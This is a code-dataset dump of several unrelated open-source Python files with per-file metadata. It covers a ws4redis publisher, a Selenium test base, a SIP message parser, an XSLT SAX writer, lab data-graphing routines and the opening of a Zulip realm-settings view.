conn_args = dict(settings.WS4REDIS_CONNECTION,
path=settings.WS4REDIS_CONNECTION['unix_socket_path'])
del conn_args['unix_socket_path']
redis_connection_pool = ConnectionPool(connection_class=UnixDomainSocketConnection, **conn_args)
else:
redis_connection_pool = ConnectionPool(**settings.WS4REDIS_CONNECTION)
class RedisPublisher(RedisStore):
def __init__(self, **kwargs):
"""
Initialize the channels for publishing messages through the message queue.
"""
connection = StrictRedis(connection_pool=redis_connection_pool)
super(RedisPublisher, self).__init__(connection)
for key in self._get_message_channels(**kwargs):
self._publishers.add(key)
def fetch_message(self, request, facility, audience='any'):
"""
Fetch the first message available for the given ``facility`` and ``audience``, if it has
been persisted in the Redis datastore.
The current HTTP ``request`` is used to determine to whom the message belongs.
A unique string is used to identify the bucket's ``facility``.
Determines the ``audience`` to check for the message. Must be one of ``broadcast``,
``group``, ``user``, ``session`` or ``any``. The default is ``any``, which means to check
for all possible audiences.
"""
prefix = self.get_prefix()
channels = []
if audience in ('session', 'any',):
if request and request.session:
channels.append('{prefix}session:{0}:{facility}'.format(request.session.session_key, prefix=prefix, facility=facility))
if audience in ('user', 'any',):
if is_authenticated(request):
channels.append('{prefix}user:{0}:{facility}'.format(request.user.get_username(), prefix=prefix, facility=facility))
if audience in ('group', 'any',):
try:
if is_authenticated(request):
groups = request.session['ws4redis:memberof']
channels.extend('{prefix}group:{0}:{facility}'.format(g, prefix=prefix, facility=facility)
for g in groups)
except (KeyError, AttributeError):
pass
if audience in ('broadcast', 'any',):
channels.append('{prefix}broadcast:{facility}'.format(prefix=prefix, facility=facility))
for channel in channels:
message = self._connection.get(channel)
if message:
return message
|
mit
| -6,769,983,965,469,551,000
| 48.965517
| 135
| 0.638026
| false
| 4.364458
| false
| false
| false
|
annapowellsmith/openpresc
|
openprescribing/frontend/tests/functional/selenium_base.py
|
1
|
4639
|
import os
import subprocess
import unittest
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.conf import settings
# Django 1.11 removes the ability to supply a port range for liveserver tests,
# so we replicate that here. See: https://code.djangoproject.com/ticket/28212
# and https://code.djangoproject.com/ticket/26011
available_test_ports = iter(range(6080, 6580))
def use_saucelabs():
return os.environ.get('TRAVIS') or os.environ.get('USE_SAUCELABS')
@unittest.skipIf(
os.environ.get('TEST_SUITE') == 'nonfunctional',
"nonfunctional tests specified in TEST_SUITE environment variable")
class SeleniumTestCase(StaticLiveServerTestCase):
host = '0.0.0.0'
display = None
@classmethod
def setUpClass(cls):
cls.port = next(available_test_ports)
try:
cls.browser = cls.get_browser()
except Exception:
if cls.display:
cls.display.stop()
raise
cls.browser.maximize_window()
cls.browser.implicitly_wait(1)
super(SeleniumTestCase, cls).setUpClass()
@classmethod
def get_browser(cls):
if use_saucelabs():
return cls.get_saucelabs_browser()
else:
if cls.use_xvfb():
from pyvirtualdisplay import Display
cls.display = Display(visible=0, size=(1200, 800))
cls.display.start()
return cls.get_firefox_driver()
@classmethod
def get_saucelabs_browser(cls):
browser, version, platform = os.environ['BROWSER'].split(":")
caps = {'browserName': browser}
caps['platform'] = platform
caps['version'] = version
caps['screenResolution'] = '1600x1200'
# Disable slow script warning in IE
caps['prerun'] = {
'executable': ('https://raw.githubusercontent.com/'
'ebmdatalab/openprescribing/'
'master/scripts/setup_ie_8.bat'),
'background': 'false'
}
username = os.environ["SAUCE_USERNAME"]
access_key = os.environ["SAUCE_ACCESS_KEY"]
if os.environ.get('TRAVIS'):
caps["tunnel-identifier"] = os.environ.get(
"TRAVIS_JOB_NUMBER", 'n/a')
caps["build"] = os.environ.get("TRAVIS_BUILD_NUMBER", 'n/a')
caps["tags"] = ["CI"]
else:
caps["tags"] = ["from-dev-sandbox"]
if os.environ.get('TRAVIS') or os.path.exists('/.dockerenv'):
hub_url = "%s:%s@saucehost:4445" % (username, access_key)
else:
hub_url = "%s:%s@localhost:4445" % (username, access_key)
return webdriver.Remote(
desired_capabilities=caps,
command_executor="http://%s/wd/hub" % hub_url)
@classmethod
def use_xvfb(cls):
if not os.environ.get('SHOW_BROWSER', False):
return subprocess.call(
"type xvfb-run", shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
else:
return False
@classmethod
def get_firefox_driver(cls):
return webdriver.Firefox(
log_path="%s/logs/webdriver.log" % settings.REPO_ROOT)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
if cls.display:
cls.display.stop()
super(SeleniumTestCase, cls).tearDownClass()
def _find_and_wait(self, locator_type, locator, waiter):
if use_saucelabs():
wait = 60
else:
wait = 5
try:
element = WebDriverWait(self.browser, wait).until(
waiter((locator_type, locator))
)
return element
except TimeoutException:
raise AssertionError("Expected to find element %s" % locator)
def find_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.presence_of_element_located)
def find_visible_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.visibility_of_element_located)
def find_by_css(self, locator):
return self._find_and_wait(By.CSS_SELECTOR, locator, EC.presence_of_element_located)
def find_visible_by_css(self, locator):
return self._find_and_wait(By.CSS_SELECTOR, locator, EC.visibility_of_element_located)
|
mit
| -4,036,378,167,837,115,400
| 34.143939
| 94
| 0.613063
| false
| 3.895046
| true
| false
| false
|
tzewangdorje/SIPserv
|
sipServ/message.py
|
1
|
6199
|
# core
import traceback, random, re
from collections import OrderedDict
# sipServ
from header import HeaderField
from userAgent import UserAgentServer
class Message(object):
def __init__(self, data=None):
self.indentifier = None
self.request = None
self.final = None
self.header = OrderedDict()
self.body = ""
self.sent = False
if data:
self._parse(data)
if not self._validate():
raise Exception('Invalid Message format')
def __repr__(self):
ret = "{\n"
ret = ret+" 'StartLine': '"+self.start_line+"',\n"
ret = ret+" 'Header': {\n"
for field in self.header:
ret = ret+" '"+field.name+"': {\n"
for value in field.values:
ret = ret+" "+str(value)+",\n"
ret = ret+" },\n"
ret = ret+" 'Body': '"+self.body+"'\n"
ret = ret+"}\n"
return ret
def write(self):
ret = self.start_line + "\r\n"
for key,field in self.header.iteritems():
ret = ret + field.write() + "\r\n"
ret = ret + "\r\n"
ret = ret + self.body
return ret
def _parse(self, data):
headerDone = False
start = True
lines = data.splitlines()
for line in lines:
if start:
self.start_line = line
start = False
elif line=="":
headerDone = True
elif headerDone:
self.body = self.body+line
else:
headerField = HeaderField(line)
try:
key = headerField.name.lower()
self.header[key] = headerField
except: # this header field already exists, so add values to the existing one, TO DO
# header[hf.name].append(hf)
print traceback.format_exc()
def _validate(self):
return True
def getUserAgent(self):
return UserAgentServer()
def isRequest(self):
return self.request
def isResponse(self):
return not self.request
def isProvisional(self):
return not self.request and not self.final
def isFinal(self):
return not self.request and self.final
def getId(self):
try:
return self.header["via"].values[0].params["branch"]
except:
return None
class MessageRequest(Message):
def __init__(self, data):
Message.__init__(self, data)
self.request = True
self.requestUri = self.start_line.split(" ")[1]
@property
def addressOfRecord(self):
to = self.header["to"].values[0].value
m = re.search(r"<(.+)>", to)
return m.group(1)
def getReturnIp(self):
via = self.header["via"]
return via.values[0].value.split(" ")[1]
def getReturnPort(self):
via = self.header["via"]
if via.values[0].params["rport"].isdigit():
return via.values[0].params["rport"]
else:
return "5060"
def getReturnTransport(self):
via = self.header["via"]
return via.values[0].value.split(" ")[0].split("/")[2]
class MessageResponse(Message):
@property
def start_line(self):
return "SIP/2.0 "+self.code+" "+self.reasonPhrase
def __init__(self, data):
Message.__init__(self, data)
self.request = False
self.code = ""
self.reasonPhrase = ""
def configureByRequest(self, requestMessage):
self.returnIp = requestMessage.getReturnIp()
self.returnPort = requestMessage.getReturnPort()
self.returnTransport = requestMessage.getReturnTransport()
self.header["via"] = requestMessage.header["via"]
toField = requestMessage.header["to"]
try:
toField.values[0].params["tag"]
except KeyError:
# no dialog tag yet - add one
toField.values[0].params["tag"] = '%x' % random.randint(0,2**31)
self.header["to"] = toField
self.header["from"] = requestMessage.header["from"]
self.header["call-id"] = requestMessage.header["call-id"]
self.header["cseq"] = requestMessage.header["cseq"]
class MessageRequestRegister(MessageRequest):
def __init__(self, data=None):
MessageRequest.__init__(self, data)
self.identifier = "REGISTER"
class MessageRequestInvite(MessageRequest):
def __init__(self, data=None):
MessageRequest.__init__(self, data)
self.identifier = "INVITE"
class MessageResponseProvisional(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "PROVISIONAL"
self.final = False
class MessageResponseSuccess(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "SUCCESS"
self.final = True
class MessageResponseRedirect(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "REDIRECT"
self.final = True
class MessageResponseClientError(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "CLIENT_ERROR"
def configureByRequest(self, requestMessage):
MessageResponse.configureByRequest(self, requestMessage)
if self.code=="405":
self.header.append( HeaderField("Allow: INVITE,ACK,BYE,CANCEL,OPTIONS") ) # INVITE missing for testing!
class MessageResponseServerError(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "SERVER_ERROR"
class MessageResponseGlobalFailure(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "GLOBAL_FAILURE"
|
gpl-3.0
| 7,854,859,847,364,854,000
| 28.52381
| 115
| 0.556541
| false
| 4.163197
| false
| false
| false
|
Pikecillo/genna
|
external/4Suite-XML-1.0.2/Ft/Xml/Xslt/SaxWriter.py
|
1
|
7538
|
########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Xml/Xslt/SaxWriter.py,v 1.9 2005/03/18 23:47:19 jkloth Exp $
"""
SAX2 event writer for XSLT output
Copyright 2005 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
import os
from Ft.Xml import EMPTY_NAMESPACE, XMLNS_NAMESPACE
from Ft.Xml import CheckVersion
from Ft.Xml.Domlette import implementation
from Ft.Xml.Lib.XmlString import IsXmlSpace, SplitQName
from Ft.Xml.XPath import Util
from Ft.Xml.Xslt import XSL_NAMESPACE, TextSax
from Ft.Xml.Xslt import OutputParameters
class ElementData:
def __init__(self, name, attrs, extraNss=None):
self.name = name
self.attrs = attrs
self.extraNss = extraNss or {}
try:
from xml.dom.ext.reader import Sax, Sax2, HtmlSax
except ImportError:
#It will be caught if a SaxWriter is created
pass
class SaxWriter:
"""
Requires PyXML (will be checked at instantiation time).
"""
def __init__(self, outputParams, saxHandler=None, fragment=False):
CheckVersion(feature="4XSLT's SaxWriter")
self.__fragment = fragment
self.__firstElementFlag = True
self.__orphanedNodes = []
self.__saxHandlerClass = None
self.__saxHandler = None
self.__stateStack = []
self.__currElement = None
self.__currText = u''
self._outputParams = outputParams or OutputParameters.OutputParameters()
if saxHandler:
self.__saxHandler = saxHandler
elif self.__outputParams.method == 'xml':
self.__initSaxHandler(Sax2.XmlDomGenerator)
if self.__outputParams.omitXmlDeclaration in [None, 'no']:
self.__saxHandler.xmlDecl(
self.__outputParams.version,
self.__outputParams.encoding,
self.__outputParams.standalone
)
elif self.__outputParams.method == 'html':
self.__initSaxHandler(HtmlSax.HtmlDomGenerator)
elif self.__outputParams.method == 'text':
self.__initSaxHandler(TextSax.TextGenerator)
def startDocument(self):
return
def endDocument(self):
return
def complete(self):
return self.__saxHandler and self.__saxHandler.getRootNode() or None
def getResult(self):
self.__completeTextNode()
return self.__saxHandler.getRootNode()
def __initSaxHandler(self, saxHandlerClass):
self.__saxHandlerClass = saxHandlerClass
self.__saxHandler = saxHandlerClass(keepAllWs=1)
for o_node in self.__orphanedNodes:
if o_node[0] == 'pi':
self.__saxHandler.processingInstruction(o_node[1], o_node[2])
elif o_node[0] == 'comment':
self.__saxHandler.comment(o_node[1])
del self.__orphanedNodes
return
def __initSax2Doc(self, doctype):
self.__firstElementFlag = False
if not self.__fragment:
if not self.__saxHandler:
self.__initSaxHandler(Sax2.XmlDomGenerator)
if self.__outputParams.omitXmlDeclaration in [None, 'no']:
self.__saxHandler.xmlDecl(
self.__outputParams.version,
self.__outputParams.encoding,
self.__outputParams.standalone
)
self.__saxHandler.startDTD(doctype, self.__outputParams.doctypeSystem, self.__outputParams.doctypePublic)
self.__saxHandler.endDTD()
return
def __initHtmlSaxDoc(self, doctype):
self.__firstElementFlag = False
if not self.__saxHandler:
self.__initSaxHandler(HtmlSax.HtmlDomGenerator)
#self.__saxHandler._4dom_startDTD(doctype, self.__outputParams.doctypeSystem, self.__outputParams.doctypePublic)
#self.__saxHandler.endDTD()
def __completeTextNode(self):
#FIXME: This does not allow multiple root nodes, which is required to be supported
if self.__currText:
if IsXmlSpace(self.__currText):
self.__saxHandler.ignorableWhitespace(self.__currText)
else:
self.__saxHandler.characters(self.__currText)
self.__currText = u''
return
def startElement(self, name, namespace=EMPTY_NAMESPACE, extraNss=None):
extraNss = extraNss or {}
attrs = {}
if self.__firstElementFlag:
if not self.__outputParams.method:
if not namespace and name.upper() == 'HTML':
self.__outputParams.method = 'html'
else:
self.__outputParams.method = 'xml'
if self.__outputParams.method == 'xml':
self.__initSax2Doc(name)
else:
self.__initHtmlSaxDoc(name)
self.__firstElementFlag = False
self.__completeTextNode()
if self.__currElement:
self.__saxHandler.startElement(self.__currElement.name, self.__currElement.attrs)
self.__currElement = None
self.__currElement = ElementData(name, attrs, extraNss)
if self.__outputParams.method == 'xml':
if namespace:
(prefix, local) = SplitQName(name)
if prefix:
self.__currElement.attrs["xmlns:"+prefix] = namespace
else:
self.__currElement.attrs["xmlns"] = namespace
for prefix in extraNss.keys():
if prefix:
new_element.setAttributeNS(XMLNS_NAMESPACE,
u'xmlns:'+prefix,
extraNss[prefix])
else:
new_element.setAttributeNS(XMLNS_NAMESPACE,
u'xmlns',
extraNss[''])
return
def endElement(self, name):
self.__completeTextNode()
if self.__currElement:
self.__saxHandler.startElement(
self.__currElement.name,
self.__currElement.attrs
)
self.__currElement = None
self.__saxHandler.endElement(name)
return
def text(self, text, escapeOutput=True):
if self.__currElement:
self.__saxHandler.startElement(
self.__currElement.name,
self.__currElement.attrs
)
self.__currElement = None
self.__saxHandler.characters(text)
return
def attribute(self, name, value, namespace=EMPTY_NAMESPACE):
self.__currElement.attrs[name] = value
if namespace:
(prefix, local) = SplitQName(name)
if prefix:
self.__currElement.attrs[u"xmlns:"+prefix] = namespace
return
def processingInstruction(self, target, data):
self.__completeTextNode()
if self.__saxHandler:
self.__saxHandler.processingInstruction(target, data)
else:
self.__orphanedNodes.append(('pi', target, data))
return
def comment(self, body):
self.__completeTextNode()
if self.__saxHandler:
self.__saxHandler.comment(body)
else:
self.__orphanedNodes.append(('comment', body))
return
|
gpl-2.0
| -4,203,331,712,846,488,600
| 36.316832
| 120
| 0.568188
| false
| 4.415934
| false
| false
| false
|
DCSR/Analysis
|
GraphsTab.py
|
1
|
13519
|
"""
This file contains all the precedures called from the GraphsTab
There are several ways to graph stuff. Much of what is in this files draws to a ttk canvas,
in this case self.graphCanvas.
The other way is to use matplotlib.
Index: (alphabetical)
cocaineModel() OK
cumulativeRecord() OK
eventRecords() OK
eventRecordsIntA() OK
histogram() OK
pumpDurationIntA() OK
timeStamps() OK
"""
import GraphLib
import model
import ListLib
def cocaineModel(aCanvas,aRecord,max_x_scale,resolution = 60, aColor = "blue", clear = True, max_y_scale = 20):
if clear:
aCanvas.delete('all')
x_zero = 75
y_zero = 350
x_pixel_width = 500 #700
y_pixel_height = 150 #200
x_divisions = 12
y_divisions = 4
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
GraphLib.eventRecord(aCanvas, x_zero+5, 185, x_pixel_width, max_x_scale, aRecord.datalist, ["P"], "")
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions, color = "black")
GraphLib.drawYaxis(aCanvas, x_zero, y_zero, y_pixel_height, max_y_scale, y_divisions, True, color = "black")
x_scaler = x_pixel_width / (max_x_scale*60*1000)
y_scaler = y_pixel_height / max_y_scale
cocConcXYList = model.calculateCocConc(aRecord.datalist,aRecord.cocConc,aRecord.pumpSpeed,resolution)
# print(modelList)
x = x_zero
y = y_zero
totalConc = 0
totalRecords = 0
startAverageTime = 10 * 60000 # 10 min
endAverageTime = 180 * 60000 # 120 min
for pairs in cocConcXYList:
if pairs[0] >= startAverageTime:
if pairs[0] < endAverageTime:
totalRecords = totalRecords + 1
totalConc = totalConc + pairs[1]
concentration = round(pairs[1],2)
newX = x_zero + pairs[0] * x_scaler // 1
newY = y_zero - concentration * y_scaler // 1
aCanvas.create_line(x, y, newX, newY, fill= aColor)
# aCanvas.create_oval(newX-2, newY-2, newX+2, newY+2, fill=aColor)
x = newX
y = newY
aCanvas.create_text(300, 400, fill = "blue", text = aRecord.fileName)
"""
dose = 2.8*aRecord.cocConc * aRecord.pumpSpeed
tempStr = "Duration (2.8 sec) * Pump Speed ("+str(aRecord.pumpSpeed)+" ml/sec) * cocConc ("+str(aRecord.cocConc)+" mg/ml) = Unit Dose "+ str(round(dose,3))+" mg/inj"
aCanvas.create_text(300, 450, fill = "blue", text = tempStr)
"""
averageConc = round((totalConc/totalRecords),3)
# draw average line
X1 = x_zero + (startAverageTime * x_scaler) // 1
Y = y_zero-((averageConc) * y_scaler) // 1
X2 = x_zero + (endAverageTime * x_scaler) // 1
# aCanvas.create_line(X1, Y, X2, Y, fill= "red")
# tempStr = "Average Conc (10-180 min): "+str(averageConc)
# aCanvas.create_text(500, Y, fill = "red", text = tempStr)
def cumulativeRecord(aCanvas,aRecord,showBPVar,max_x_scale,max_y_scale):
aCanvas.delete('all')
# graphCanvas is 800 x 600
x_zero = 50
y_zero = 550
x_pixel_width = 700
y_pixel_height = 500
x_divisions = 12
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
y_divisions = 10
aTitle = aRecord.fileName
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions)
GraphLib.drawYaxis(aCanvas, x_zero, y_zero, y_pixel_height, max_y_scale, y_divisions, True)
GraphLib.cumRecord(aCanvas, x_zero, y_zero, x_pixel_width, y_pixel_height, max_x_scale, max_y_scale, \
aRecord.datalist,showBPVar, aTitle)
def eventRecords(aCanvas,aRecordList,max_x_scale):
# graphCanvas is 800 x 600
aCanvas.delete('all')
x_zero = 50
x_pixel_width = 700
x_divisions = 12
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
GraphLib.drawXaxis(aCanvas, x_zero, 550, x_pixel_width, max_x_scale, x_divisions)
y_zero = 30
box = 0
# eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, datalist, charList, aLabel)
# aTitle = aRecord.fileName
for record in aRecordList:
y_zero = y_zero + 40
box = box + 1
aTitle = "Box "+str(box)
GraphLib.eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, record.datalist, ["P"], aTitle)
def eventRecordsIntA(aCanvas,aRecord):
# graphCanvas is 800 x 600
aCanvas.delete('all')
x_zero = 75
x_pixel_width = 600
x_divisions = 12
max_x_scale = 5
x_divisions = 5
GraphLib.drawXaxis(aCanvas, x_zero, 550, x_pixel_width, max_x_scale, x_divisions)
y_zero = 50
for block in range(12):
aTitle = str(block+1)
pump_timestamps = ListLib.get_pump_timestamps(aRecord.datalist,block)
GraphLib.eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, pump_timestamps, ["P","p"], aTitle)
y_zero = y_zero + 45
def histogram(aCanvas, aRecord,max_x_scale,clear = True):
"""
Draws a histogram using the datalist from aRecord.
To Do: There is another histogram procedure in GraphLib. Should be merged.
"""
def drawBar(aCanvas,x,y, pixelHeight, width, color = "black"):
aCanvas.create_line(x, y, x, y-pixelHeight, fill=color)
aCanvas.create_line(x, y-pixelHeight, x+width, y-pixelHeight, fill=color)
aCanvas.create_line(x+width, y-pixelHeight, x+width, y, fill=color)
if clear:
aCanvas.delete('all')
# Draw Event Record
x_zero = 75
y_zero = 100
x_pixel_width = 700
y_pixel_height = 200
x_divisions = 12
y_divisions = 5
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
aCanvas.create_text(200, y_zero-50 , fill = "blue", text = aRecord.fileName)
GraphLib.eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, aRecord.datalist, ["P"], "")
# Populate bin array
binSize = 1 # in minutes
intervals = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
T1 = 0
numInj = 0
numIntervals = 0
outOfRange = 0
totalIntervals = 0
for pairs in aRecord.datalist:
if pairs[1] == "P":
numInj = numInj + 1
T2 = pairs[0]
if T1 > 0:
numIntervals = numIntervals + 1
interval = round((T2-T1)/(binSize*60000),3) # rounded to a minute with one decimal point
totalIntervals = totalIntervals + interval
index = int(interval)
if index < len(intervals)-1:
intervals[index] = intervals[index]+1
else:
outOfRange = outOfRange+1
T1 = T2
tempStr = "Number of Injections = "+str(numInj)
aCanvas.create_text(450, y_zero-50, fill = "blue", text = tempStr)
# print("Number of Inter-injection Intervals =",numIntervals)
# print("Inter-injection Intervals = ",intervals)
meanInterval = round(totalIntervals / numIntervals,3)
x_zero = 75
y_zero = 450
x_pixel_width = 400
y_pixel_height = 300
max_x_scale = 20
max_y_scale = 20
x_divisions = 20
y_divisions = max_y_scale
labelLeft = True
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions, color = "black")
GraphLib.drawYaxis(aCanvas, x_zero, y_zero, y_pixel_height, max_y_scale, y_divisions, labelLeft, color = "black")
# intervals = [0,1,2,3,4,5,6,5,4,3,2,1,0,0,0,0,0,0,0,1] #Used for test without loading a file
unitPixelHeight = int(y_pixel_height/y_divisions)
width = int(x_pixel_width/len(intervals))
for i in range(len(intervals)):
x = x_zero + (i*width)
drawBar(aCanvas,x,y_zero,intervals[i]*unitPixelHeight,width)
#Draw OutOfRange Bar
x = x_zero + (len(intervals)*width) + 20
drawBar(aCanvas,x,y_zero,outOfRange*unitPixelHeight,width)
tempStr = "Mean interval (min) = "+ str(meanInterval)
aCanvas.create_text(200, y_zero-y_pixel_height, fill = "red", text = tempStr)
rate = round(60/meanInterval,3)
tempStr = "Rate (inj/hr) = "+str(rate)
aCanvas.create_text(450, y_zero-y_pixel_height, fill = "blue", text = tempStr)
aCanvas.create_line(x_zero+int(width*meanInterval), y_zero, x_zero+int(width*meanInterval), y_zero-y_pixel_height+20, fill="red")
tempStr = "Each Bin = "+str(binSize)+" minute"
aCanvas.create_text(250, y_zero+50, fill = "blue", text = tempStr)
def pumpDurationsIntA(aCanvas,aRecord):
aCanvas.delete('all')
pump_timelist = ListLib.get_pump_duration_list(aRecord.datalist, -1)
duration_list = []
for data in pump_timelist:
duration_list.append(data[2])
x_zero = 75
y_zero = 50
x_pixel_width = 600
x_divisions = 12
max_x_scale = 5
x_divisions = 5
GraphLib.drawXaxis(aCanvas, x_zero, 550, x_pixel_width, max_x_scale, x_divisions)
x_scaler = x_pixel_width / (max_x_scale*60*1000)
y_zero = 50
block = 0
for block in range(12):
x = x_zero
y = y_zero
aLabel = str(block+1)
pump_timelist = ListLib.get_pump_duration_list(aRecord.datalist,block)
aCanvas.create_text(x_zero-30, y_zero-5, fill="blue", text = aLabel)
for data in pump_timelist:
newX = (x_zero + data[1] * x_scaler // 1)
aCanvas.create_line(x, y, newX, y)
height = int(data[2]/40)
aCanvas.create_line(newX, y, newX, y-height)
x = newX
y_zero = y_zero + 45
def timeStamps(aCanvas,aRecord,max_x_scale):
# graphCanvas is 800 x 600
aCanvas.delete('all')
x_zero = 100
y_zero = 550
x_pixel_width = 650
x_divisions = 12
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
# Axis at (100,550)
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions, color = "black")
startTime = 0;
if len(aRecord.datalist) > 0:
firstEntry=(aRecord.datalist[0])
if (firstEntry[1] == 'M'):
startTime = firstEntry[0]
#print("StartTime =",startTime)
topRow = 40
spacing = 18
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions)
GraphLib.eventRecord(aCanvas, x_zero, topRow, x_pixel_width, max_x_scale, aRecord.datalist, ["T","t"], "L1 Trial")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing), x_pixel_width, max_x_scale, aRecord.datalist, ["=","."], "Lever 1")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*2), x_pixel_width, max_x_scale, aRecord.datalist, ["L"], "L1 Resp")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*3), x_pixel_width, max_x_scale, aRecord.datalist, [">"], "L1 inactive")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*4), x_pixel_width, max_x_scale, aRecord.datalist, ["J"], "L2 active")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*5), x_pixel_width, max_x_scale, aRecord.datalist, ["<"], "L2 inactive")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*6), x_pixel_width, max_x_scale, aRecord.datalist, ["P","p"], "Pump")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*7), x_pixel_width, max_x_scale, aRecord.datalist, ["S","s"], "Stim")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*8), x_pixel_width, max_x_scale, aRecord.datalist, ["C","c"], "Stim 2")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*9), x_pixel_width, max_x_scale, aRecord.datalist, ["O","o"], "TimeOut")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*10), x_pixel_width, max_x_scale, aRecord.datalist, ["Z","z"], "HD Trial")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*11), x_pixel_width, max_x_scale, aRecord.datalist, ["~",","], "Lever 2")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*12), x_pixel_width, max_x_scale, aRecord.datalist, ["H","h"], "HD Resp")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*13), x_pixel_width, max_x_scale, aRecord.datalist, ["B","b"], "Block")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*14), x_pixel_width, max_x_scale, aRecord.datalist, ["I","i"], "IBI")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*15), x_pixel_width, max_x_scale, aRecord.datalist, ["G","E"], "Session")
aCanvas.create_text(15, topRow+(spacing*16)+4, fill="red", text="Errors", anchor = "w")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*18), x_pixel_width, max_x_scale, aRecord.datalist, ["@"], "@ Input", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*19), x_pixel_width, max_x_scale, aRecord.datalist, ["#"], "# Recover", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*20), x_pixel_width, max_x_scale, aRecord.datalist, ["$"], "$ Output", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*21), x_pixel_width, max_x_scale, aRecord.datalist, ["%"], "% Recover", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*22), x_pixel_width, max_x_scale, aRecord.datalist, ["&"], "& Reset", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*23), x_pixel_width, max_x_scale, aRecord.datalist, ["!"], "! Abort",t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*24), x_pixel_width, max_x_scale, aRecord.datalist, ["("], "( Safe",t_zero = startTime)
"""
def drawCumulativeRecord(aRecord,aCanvas):
print("drawCumulativeRecord called")
"""
|
gpl-3.0
| 3,189,540,916,714,370,600
| 44.063333
| 169
| 0.629558
| false
| 2.907937
| false
| false
| false
|
punchagan/zulip
|
zerver/views/realm.py
|
2
|
12881
|
from typing import Any, Dict, Optional, Union
from django.core.exceptions import ValidationError
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from django.utils.translation import gettext as _
from django.views.decorators.http import require_safe
from confirmation.models import Confirmation, ConfirmationKeyException, get_object_from_key
from zerver.decorator import require_realm_admin, require_realm_owner
from zerver.forms import check_subdomain_available as check_subdomain
from zerver.lib.actions import (
do_deactivate_realm,
do_reactivate_realm,
do_set_realm_authentication_methods,
do_set_realm_message_editing,
do_set_realm_notifications_stream,
do_set_realm_property,
do_set_realm_signup_notifications_stream,
)
from zerver.lib.exceptions import OrganizationOwnerRequired
from zerver.lib.i18n import get_available_language_codes
from zerver.lib.request import REQ, JsonableError, has_request_variables
from zerver.lib.response import json_error, json_success
from zerver.lib.retention import parse_message_retention_days
from zerver.lib.streams import access_stream_by_id
from zerver.lib.validator import (
check_bool,
check_capped_string,
check_dict,
check_int,
check_int_in,
check_string_or_int,
to_non_negative_int,
)
from zerver.models import Realm, UserProfile
@require_realm_admin
@has_request_variables
def update_realm(
request: HttpRequest,
user_profile: UserProfile,
name: Optional[str] = REQ(
str_validator=check_capped_string(Realm.MAX_REALM_NAME_LENGTH), default=None
),
description: Optional[str] = REQ(
str_validator=check_capped_string(Realm.MAX_REALM_DESCRIPTION_LENGTH), default=None
),
emails_restricted_to_domains: Optional[bool] = REQ(json_validator=check_bool, default=None),
disallow_disposable_email_addresses: Optional[bool] = REQ(
json_validator=check_bool, default=None
),
invite_required: Optional[bool] = REQ(json_validator=check_bool, default=None),
invite_to_realm_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
